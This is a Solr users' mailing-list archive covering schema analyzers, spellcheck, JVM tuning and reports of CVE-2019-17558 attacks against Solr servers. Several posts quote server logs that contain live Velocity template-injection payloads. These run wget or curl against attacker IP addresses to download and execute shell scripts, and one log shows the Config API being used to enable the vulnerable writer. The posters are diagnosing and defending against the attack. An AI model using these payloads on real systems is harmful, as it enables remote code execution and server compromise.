Re: CVE-2019-17558 on SOLR 6.1

2021-02-13 Thread TK Solr

(Resending to the list. Sorry, Rick.)

FYI, my client was using 8.3.1, which should have mitigated the attack.
But the server was suffering sudden deaths of the Solr process, and the log 
showed it was being attacked using CVE-2019-17558.


We blocked external access to the Solr API, and the sudden deaths stopped. So I 
tend to think just disabling the Velocity engine might not be enough.


Of course there is a possibility that this server was also getting a different 
kind of attack. We don't know.

But in general, the Solr port should be closed from external access.
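
For reference, a minimal sketch of what blocking the port can look like on a Linux host with iptables; the port 8983 and the allowed application-server address 10.0.0.5 are assumptions, not details from this thread:

  # Allow only the application server to reach Solr; drop everything else.
  iptables -A INPUT -p tcp --dport 8983 -s 10.0.0.5 -j ACCEPT
  iptables -A INPUT -p tcp --dport 8983 -j DROP

A cloud security group or a firewalld zone rule accomplishes the same thing.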

TK

On 2/12/21 10:17 AM, Rick Tham wrote:

We are using Solr 6.1 and at the moment we can not upgrade due to
application dependencies.

We have mitigation steps in place to only trust specific machines within
our DMZ.

I am trying to figure out if the following is an additional valid
mitigation step for CVE-2019-17558 on Solr 6.1. None of our solrconfig.xml
files contains the <lib/> references to the Velocity jar files.

It doesn't appear that you can add these jar references using the Config
API. Without these references, you are not able to flip
params.resource.loader.enabled to true using the Config API. If you are not
able to flip the flag and none of your cores have these lib references, is
the risk still present?
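
One hedged way to double-check is to ask the Config API what is currently registered; a sketch, assuming a core named mycore (the core name is a placeholder):

  # List the configured queryResponseWriters and any runtime overrides.
  curl 'http://localhost:8983/solr/mycore/config/queryResponseWriter'
  curl 'http://localhost:8983/solr/mycore/config/overlay'

If neither response shows a "velocity" writer with params.resource.loader.enabled=true, that would suggest the writer has not been enabled on that core.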

Thanks in advance!



Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Oops, I should have referenced this document instead:

https://www.tenable.com/cve/CVE-2019-17558


On 2/3/21 2:42 PM, TK Solr wrote:

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability 



If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:


webapp=/solr path=/select 
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity} 
status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) 
[c:sitecore_submittals_index s:shard1 r:core_node1 
x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to 
create a new queryResponseWriter with {type = queryResponseWriter,name = 
velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args 
= 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. After that, my client's 
Solr node has been running for 4 weeks so far. I think this security hole 
doesn't just leak information; it can also kill the Solr process.


TK





Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:



webapp=/solr path=/select 
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
 status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) [c:sitecore_submittals_index 
s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] 
o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = 
queryResponseWriter,name = velocity,class = 
solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, 
class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. After that, my client's Solr 
node has been running for 4 weeks so far. I think this security hole doesn't 
just leak information; it can also kill the Solr process.


TK




Re: "Failed to reserve shared memory."

2021-01-07 Thread TK Solr

I added these lines to solr.in.sh and restarted Solr:

 GC_TUNE=('-XX:+UseG1GC' \
   '-XX:+PerfDisableSharedMem' \
   '-XX:+ParallelRefProcEnabled' \
   '-XX:MaxGCPauseMillis=250' \
   '-XX:+AlwaysPreTouch' \
   '-XX:+ExplicitGCInvokesConcurrent')

According to the Admin UI, -XX:+UseLargePages is gone, which is good, but all the 
other -XX:* options except -XX:+UseG1GC are also gone.


What is the correct way to remove just -XX:+UseLargePages?
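
A guess at what happened, based on the bin/solr excerpt quoted below: when GC_TUNE is defined in solr.in.sh as a bash array, the unquoted $GC_TUNE in GC_TUNE=($GC_TUNE) expands to only the first array element, so every flag after -XX:+UseG1GC is dropped. A hedged sketch of the single-string form the script appears to expect (same flags as above, without -XX:+UseLargePages):

  # solr.in.sh -- GC_TUNE as one space-separated string (sketch only)
  GC_TUNE="-XX:+UseG1GC -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled \
  -XX:MaxGCPauseMillis=250 -XX:+AlwaysPreTouch -XX:+ExplicitGCInvokesConcurrent"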

TK

On 1/6/21 3:42 PM, TK Solr wrote:
My client is seeing sudden-death crashes of Solr 8.3.1: Solr stops 
responding suddenly and they have to restart it.
(It is not clear whether the Solr/Jetty process was dead, or alive but not 
responding. No OOM log was found.)


In the Solr start up log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors.


I found this article

https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er 



which suggests removing the JVM option -XX:+UseLargePages, which is added by the 
bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not 
quite sure what kind of variable GC_TUNE is. It is used as in:


  if [ -z ${GC_TUNE+x} ]; then
...

    '-XX:+AlwaysPreTouch')
  else
    GC_TUNE=($GC_TUNE)
  fi

I'm not familiar with the ${GC_TUNE+x} and ($GC_TUNE) syntax. Is this a 
special kind of environment variable?
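
These are plain bash constructs rather than anything Solr-specific; a small sketch of what each one does:

  # ${GC_TUNE+x} expands to "x" if GC_TUNE is set (even to an empty value)
  # and to nothing if it is unset, so [ -z ${GC_TUNE+x} ] means "GC_TUNE is unset".
  unset GC_TUNE
  [ -z ${GC_TUNE+x} ] && echo "GC_TUNE is unset"

  # GC_TUNE=($GC_TUNE) re-splits the current string value on whitespace
  # and turns it into a bash array, one JVM flag per element.
  GC_TUNE="-XX:+UseG1GC -XX:+PerfDisableSharedMem"
  GC_TUNE=($GC_TUNE)
  echo "${#GC_TUNE[@]}"   # prints 2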



TK






Re: The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr
Please disregard my previous post. I understand now that these are actual error messages, 
not errors from the Admin UI's own handling.


I think this server is being attacked using the vulnerability described here

https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

Fortunately the attack isn't succeeding, because of the SOLR-13971 fix; instead 
it is causing these errors. I'll fortify the Solr access.
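
In case the attacker did manage to register the Velocity response writer through the Config API (the "update-queryresponsewriter" log entries further down this archive suggest that is what the exploit attempts), a hedged sketch of removing it again; the core name is a placeholder:

  curl -X POST -H 'Content-Type: application/json' \
    'http://localhost:8983/solr/mycore/config' \
    -d '{"delete-queryresponsewriter":"velocity"}'

Blocking outside access to the Solr port, as discussed elsewhere in this archive, is still the more robust fix.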


On 1/7/21 11:02 AM, TK Solr wrote:
On the Admin UI's login screen, when the Logging tab is clicked, I see lines 
like:


Time (Local)          Level   Core       Logger         Message
1/7/2021 8:41:46 AM   ERROR   x:mycore   loader         ResourceManager: unable to find resource 'custom.vm' in any resource loader.
                      false
1/7/2021 8:41:46 AM   ERROR   x:mycore   HttpSolrCall   null:java.io.IOException: Unable to find resource 'custom.vm'
                      false



If I click on the info icon (circled "i"), this is displayed.

null:java.io.IOException: Unable to find resource 'custom.vm'
at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

...

Are these errors from the Admin UI code itself? Does the Admin UI use 
Velocity? (I thought it might be a library path issue but I don't see 
'custom.vm' anywhere in the Solr source code.)



What does "x:" prefix to the core name mean?
What does "false" under the log level mean?

I'm using Solr 8.3.1 with OpenJDK 11 on Ubuntu 18.04.3.

TK





The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr

On the Admin UI's login screen, when the Logging tab is clicked, I see lines 
like:

Time (Local)          Level   Core       Logger         Message
1/7/2021 8:41:46 AM   ERROR   x:mycore   loader         ResourceManager: unable to find resource 'custom.vm' in any resource loader.
                      false
1/7/2021 8:41:46 AM   ERROR   x:mycore   HttpSolrCall   null:java.io.IOException: Unable to find resource 'custom.vm'
                      false



If I click on the info icon (circled "i"), this is displayed.

null:java.io.IOException: Unable to find resource 'custom.vm'
at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
...

Are these errors from the Admin UI code itself? Does the Admin UI use Velocity? 
(I thought it might be a library path issue but I don't see 'custom.vm' 
anywhere in the Solr source code.)


What does "x:" prefix to the core name mean?
What does "false" under the log level mean?

I'm using Solr 8.3.1 with OpenJDK 11 on Ubuntu 18.04.3.

TK




"Failed to reserve shared memory."

2021-01-06 Thread TK Solr
My client is seeing sudden-death crashes of Solr 8.3.1: Solr stops responding 
suddenly and they have to restart it.
(It is not clear whether the Solr/Jetty process was dead, or alive but not responding. 
No OOM log was found.)


In the Solr start up log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors.


I found this article

https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er

which suggests removing the JVM option -XX:+UseLargePages, which is added by the 
bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not 
quite sure what kind of variable GC_TUNE is. It is used as in:


  if [ -z ${GC_TUNE+x} ]; then
...

    '-XX:+AlwaysPreTouch')
  else
    GC_TUNE=($GC_TUNE)
  fi

I'm not familiar with the ${GC_TUNE+x} and ($GC_TUNE) syntax. Is this a 
special kind of environment variable?



TK





Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr

It doesn't tell much:

"debug":{ "rawquerystring":"email:*@aol.com", "querystring":"email:*@aol.com", 
"parsedquery":"(email:*@aol.com)", "parsedquery_toString":"email:*@aol.com", 
"explain":{ "11d6e092-58b5-4c1b-83bc-f3b37e0797fd":{ "match":true, "value":1.0, 
"description":"email:*@aol.com"},


The email field uses ReversedWildcardFilter for both indexing and query.

On 4/15/20 12:04 PM, Erick Erickson wrote:

What do you see if you add debug=query? That should tell you….

Best,
Erick


On Apr 15, 2020, at 2:40 PM, TK Solr  wrote:

Thank you.

Is there any harm if I use it on the query side too? In my case it seems to work OK (even 
with withOriginal="false"), and it's even faster.
I see the query parser code takes a look at the index analyzer and applies 
ReversedWildcardFilter at query time. But I didn't
quite understand what happens if the query analyzer also uses 
ReversedWildcardFilter.

On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need to apply it in the index analyzer:
https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html
If it appears in the index analyzer, the query part of it is automatically
applied at query time.

The ReversedWildcardFilter indexes *every* token in reverse, with a special
character at the start ('\u0001' I believe) to avoid false positive matches
when the query term isn't reversed (e.g. if the term being indexed is mar,
then the reversed token would be \u0001ram, so a search for 'ram' wouldn't
accidentally match that). If *withOriginal* is set to true then it will
reverse the normal token as well as the reversed token.


On Thu, 9 Apr 2020 at 02:27, TK Solr  wrote:


I experimented with using ReversedWildcardFilter at index time only versus at
both index and query time.

My results show that using ReversedWildcardFilter at both times runs twice as
fast, but my dataset is not very large (on the order of 10k docs), so I'm not
sure I can draw a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown for ReversedWildcardFilter in the Solr Ref Guide
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>,
and in the only usage found in managed-schema (the text_general_rev field type),
the filter is used only for indexing.







  <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
    <analyzer type="index">
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
      <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2"
              maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
    </analyzer>
    <analyzer type="query">
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.SynonymGraphFilterFactory" ignoreCase="true" synonyms="synonyms.txt"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
    </analyzer>
  </fieldType>

Is it incorrect to use the same analyzer for query like?

  <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
    <analyzer>
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
      <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0"
              maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
    </analyzer>
  </fieldType>



In the description of the filter, I see "Tokens without wildcards are not reversed."
But the wildcard appears only in the query string. How can
ReversedWildcardFilter know whether a wildcard is being used
if the filter is applied only at indexing time?

TK






Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr

Thank you.

Is there any harm if I use it on the query side too? In my case it seems to work OK 
(even with withOriginal="false"), and it's even faster.
I see the query parser code takes a look at the index analyzer and applies 
ReversedWildcardFilter at query time. But I didn't
quite understand what happens if the query analyzer also uses 
ReversedWildcardFilter.


On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need to apply it in the index analyzer:
https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html
If it appears in the index analyzer, the query part of it is automatically
applied at query time.

The ReversedWildcardFilter indexes *every* token in reverse, with a special
character at the start ('\u0001' I believe) to avoid false positive matches
when the query term isn't reversed (e.g. if the term being indexed is mar,
then the reversed token would be \u0001ram, so a search for 'ram' wouldn't
accidentally match that). If *withOriginal* is set to true then it will
reverse the normal token as well as the reversed token.


On Thu, 9 Apr 2020 at 02:27, TK Solr  wrote:


I experimented with using ReversedWildcardFilter at index time only versus at
both index and query time.

My results show that using ReversedWildcardFilter at both times runs twice as
fast, but my dataset is not very large (on the order of 10k docs), so I'm not
sure I can draw a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown for ReversedWildcardFilter in the Solr Ref Guide
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>,
and in the only usage found in managed-schema (the text_general_rev field type),
the filter is used only for indexing.







  <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
    <analyzer type="index">
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
      <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2"
              maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
    </analyzer>
    <analyzer type="query">
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.SynonymGraphFilterFactory" ignoreCase="true" synonyms="synonyms.txt"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
    </analyzer>
  </fieldType>

Is it incorrect to use the same analyzer for query like?

  <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
    <analyzer>
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
      <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0"
              maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
    </analyzer>
  </fieldType>



In the description of the filter, I see "Tokens without wildcards are not reversed."
But the wildcard appears only in the query string. How can
ReversedWildcardFilter know whether a wildcard is being used
if the filter is applied only at indexing time?

TK




Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
I experimented with using ReversedWildcardFilter at index time only versus at 
both index and query time.

My results show that using ReversedWildcardFilter at both times runs twice as fast, 
but my dataset is not very large (on the order of 10k docs), so I'm not sure I can 
draw a conclusion.


On 4/8/20 2:49 PM, TK Solr wrote:
In the usage example shown for ReversedWildcardFilter in the Solr Ref Guide 
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>, 
and in the only usage found in managed-schema (the text_general_rev field type), 
the filter is used only for indexing.


  <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
    <analyzer type="index">
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
      <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2"
              maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
    </analyzer>
    <analyzer type="query">
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.SynonymGraphFilterFactory" ignoreCase="true" synonyms="synonyms.txt"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
    </analyzer>
  </fieldType>

Is it incorrect to use the same analyzer for query like?

  <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
    <analyzer>
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
      <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0"
              maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
    </analyzer>
  </fieldType>

In the description of the filter, I see "Tokens without wildcards are not reversed."
But the wildcard appears only in the query string. How can 
ReversedWildcardFilter know whether a wildcard is being used
if the filter is applied only at indexing time?

TK




ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
In the usage example shown for ReversedWildcardFilter in the Solr Ref Guide 
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>, 
and in the only usage found in managed-schema (the text_general_rev field type), 
the filter is used only for indexing.


  <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
    <analyzer type="index">
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
      <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="2"
              maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>
    </analyzer>
    <analyzer type="query">
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.SynonymGraphFilterFactory" ignoreCase="true" synonyms="synonyms.txt"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
    </analyzer>
  </fieldType>

Is it incorrect to use the same analyzer for query like?

  <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
    <analyzer>
      <tokenizer class="solr.StandardTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
      <filter class="solr.LowerCaseFilterFactory"/>
      <filter class="solr.ReversedWildcardFilterFactory" maxPosQuestion="0"
              maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>
    </analyzer>
  </fieldType>

In the description of the filter, I see "Tokens without wildcards are not reversed."
But the wildcard appears only in the query string. How can 
ReversedWildcardFilter know whether a wildcard is being used
if the filter is applied only at indexing time?

TK




Re: Spellcheck on specified fields?

2020-04-07 Thread TK Solr
Correction. "mark seattle" query doesn't show suggestions since "mark" alone has 
some hits.
It is when the same logic is used for a single term query of "seatle" that 3 
suggestions of "seattle"

are returned. Do I have to identify the field by using the startOffset value?

On 4/7/20 3:46 PM, TK Solr wrote:

I query on multiple field like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)&spellcheck=true

The raw query terms are distributed to all fields because I don't know which 
term is intended for which field.


If I misspell seattle, I get 3 suggestions:

"spellcheck":{
    "suggestions":[
  "seatle",{
    "numFound":1,
    "startOffset":29,
    "endOffset":35,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":50,
    "endOffset":56,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":73,
    "endOffset":79,
    "suggestion":["seattle"]}]}}

(Please disregard exact numbers. It's from more complicated query of the same 
nature.)


I think it's showing a correction suggestion for each query field.

Since the phone field keeps a phone number and spelling corrections are not 
very useful there, I would like the spellchecker to skip this and similar fields, 
but I don't see a relevant parameter in the spellchecker's documentation. Is there 
any way to specify the fields I am, or am not, interested in?

TK





Spellcheck on specified fields?

2020-04-07 Thread TK Solr

I query on multiple field like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)&spellcheck=true

The raw query terms are distributed to all fields because I don't know which term 
is intended for which field.


If I misspell seattle, I get 3 suggestions:

"spellcheck":{
    "suggestions":[
  "seatle",{
    "numFound":1,
    "startOffset":29,
    "endOffset":35,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":50,
    "endOffset":56,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":73,
    "endOffset":79,
    "suggestion":["seattle"]}]}}

(Please disregard exact numbers. It's from more complicated query of the same 
nature.)


I think it's showing a correction suggestion for each query field.

Since the phone field keeps a phone number and spelling corrections are not very 
useful there, I would like the spellchecker to skip this and similar fields, 
but I don't see a relevant parameter in the spellchecker's documentation. Is there 
any way to specify the fields I am, or am not, interested in?

TK





Proper way to manage managed-schema file

2020-04-06 Thread TK Solr
I am using Solr 8.3.1 in non-SolrCloud mode (what should I call this mode?) and 
modifying managed-schema.


I noticed that Solr does overwrite this file, wiping out all my comments and 
rearranging the order, and there is a "DO NOT EDIT" comment. So what is 
the proper/expected way to manage this file? The Admin UI can add fields but cannot 
edit existing ones or add new field types. Do I keep a script of many Schema API 
calls? (Then how do I reset the schema to the initial default, which would be 
needed before re-playing the schema calls?)
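
For what it's worth, the expected workflow with a managed schema is to drive changes through the Schema API and keep those calls in version control; a minimal sketch (the core name, field name, and type are placeholders):

  curl -X POST -H 'Content-Type: application/json' \
    'http://localhost:8983/solr/mycore/schema' \
    -d '{"add-field":{"name":"my_field","type":"text_general","stored":true}}'

Resetting to the initial state then amounts to recreating the core from the original configset and replaying the scripted calls.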


TK




Re: Admin UI core loading fails

2020-04-06 Thread TK Solr
I failed to include this line in my first post. This /select call with strange 
parameters (q=1) seems to be happening periodically even when I don't do any 
operation in the Admin UI. I scanned the Solr source code, /opt/solr, and 
/var/solr/data, and I couldn't find the source of this call.


2020-04-04 00:41:02.604 INFO (qtp231311211-24) [   x:my_core] o.a.s.c.S.Request 
[my_core] webapp=/solr path=/select 
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('curl+-o+/tmp/zzz+217.12.209.234/s.sh'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity} 
hits=0 status=0 QTime=1



On 4/2/20 12:50 AM, TK Solr wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was 
reported. But the newly added field type is not shown in the core's Analyzer 
section.


When I selected Logging from the sidebar, I saw errors like this for every core, 
not just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'
    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf 
directory.


After I restarted Solr, the core loaded without an error and I can see the newly 
added field type.


What could be the cause of these errors that only happen with the Reload 
button?

TK




Re: Admin UI core loading fails

2020-04-02 Thread TK Solr


On 4/2/20 5:39 AM, Erick Erickson wrote:

What do your Solr logs show? My bet is that your mods to the configs somehow 
caused the reload to fail too early in the process to be shown in the UI.


These are the lines in solr.log that I see leading to the stack trace (the core name 
has been changed to my_core). I don't understand why Velocity is involved. Is 
it used by the Admin UI?


2020-04-02 02:16:33.851 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.h.SolrConfigHandler Executed config commands successfully and persited to 
File System [{"update-queryresponsewriter":{

    "startup":"lazy",
    "name":"velocity",
    "class":"solr.VelocityResponseWriter",
    "template.base.dir":"",
    "solr.resource.loader.enabled":"true",
    "params.resource.loader.enabled":"true"}}]
2020-04-02 02:16:33.854 INFO  (qtp429353573-15) [   x:my_core] o.a.s.c.S.Request 
[my_core]  webapp=/solr path=/config params={} status=0 QTime=487
2020-04-02 02:16:33.854 INFO  (qtp429353573-15) [   x:my_core] o.a.s.c.SolrCore 
[my_core]  CLOSING SolrCore org.apache.solr.core.SolrCore@7b0eae1f
2020-04-02 02:16:33.855 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.m.SolrMetricManager Closing metric reporters for 
registry=solr.core.my_core, tag=SolrCore@7b0eae1f
2020-04-02 02:16:33.855 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.m.r.SolrJmxReporter Closing reporter 
[org.apache.solr.metrics.reporters.SolrJmxReporter@2f090079: rootName = null, 
domain = solr.core.my_core, service url = null, agent id = null] for registry 
solr.core.my_core / com.codahale.metrics.MetricRegistry@4125989a
2020-04-02 02:16:33.858 INFO (searcherExecutor-29-thread-1-processing-x:my_core) 
